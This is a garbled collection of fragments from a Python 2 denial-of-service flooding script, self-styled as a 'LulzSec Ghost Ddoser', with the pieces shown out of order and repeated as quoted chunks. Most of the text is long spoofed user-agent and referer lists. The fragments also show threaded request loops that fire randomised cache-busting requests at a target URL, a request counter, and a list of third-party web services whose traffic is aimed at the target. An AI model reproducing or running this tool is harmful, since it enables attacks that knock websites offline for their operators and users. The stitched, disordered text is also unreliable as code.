headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt and", "Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)')", "random import re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def", "counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter):", "headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants')", "headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML,", "headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux;", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0", "headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0", "headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0')", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=')", "Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0)", "headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project", "(previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ Up\" % (request_counter) previous=request_counter if flag==2: print", "inc_counter(): global request_counter request_counter+=1 def set_flag(val): global flag flag=val def set_safe(): global safe", "A Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)')", "+ param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset',", "6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT", "urllib2.urlopen(request) except urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ", "a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=')", "bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii", "MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev.", "RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL", "# generates a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=')", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows", "if flag==2: print \"\\n -lULZ Finish\" #execute if len(sys.argv) < 2: usage() sys.exit()", "headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0", "(KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en;", "headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie", "headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1')", "engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)')", "like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer array def referer_list(): global headers_referers", "= '' for i in range(0, size): a = random.randint(65, 90) out_str +=", "Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot')", "usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8 Privada da", "param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' +", ".NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2;", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1", "headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1", "Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')", "libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)')", "4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn", "(KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)')", "'=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))", "AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google", "headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7", "headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36')", "(compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08", "_... Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/ / | \\ \\", "Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT", "Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0", "NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3;", "(KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML,", "flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1 def set_flag(val): global flag flag=val def", "Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko)", "Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2')", "CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET", ",' :: /`-._| | | || ' : `.`.) _,' |;._:: | |", "headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=')", "|;._:: | | | | `| : `' ,' `. / |`-:_ ;", "headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA;", "http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x')", "260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like", "http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site for better indexing on www.axmo.com search", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def keyword_list(): global keyword_top", "CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0", "rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like", "BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54", "if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else: print", "keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema')", "(Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D)", "e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread):", "Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x')", "keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola')", "global flag flag=val def set_safe(): global safe safe=1 # generates a user agent", "dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)')", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1)", "x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36", "print 'Pra usar python Lulz.py <url>' print 'LulzSec Ghost Ddoser By V3I0p3r' print", "robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2", "headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel", "headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0') headers_useragents.append('Avant", "(Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have", "request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1 def set_flag(val): global flag flag=val", "libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)')", "10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)')", "headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54", "while flag<2: code=httpcall(url) if (code==800) & (safe==1): set_flag(2) except Exception, ex: pass #", "7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2;", "+ host + '/') return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\")", "/ ( ;|;-./_ _/.-:'o | / ' | / , \\._/_/_./--''/_|:|___|_,' | :", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel", "Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site for better indexing on www.axmo.com", "headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix", "(<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider')", "headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel", "_|/| \\ /-./_ \\; \\ \\,;' \\ ,\\ / \\: `:\\ \\ //", "headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler", "headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=')", "Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')", "headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling your site for better indexing", "Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR", "param_joiner=\"?\" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent',", "headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized", "com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)')", "keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge')", "(+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval", "Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback", "(<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de')", "headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac", "Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb;", "feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine", "headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus", "(+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41')", "A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U;", "headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.06 rev. 251 (http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1')", "(aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001')", "keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas')", "headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)')", "Exception, ex: pass # monitors http threads and counts requests class MonitorThread(threading.Thread): def", "4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus", "like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB", "Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727;", "headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130;", "1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') 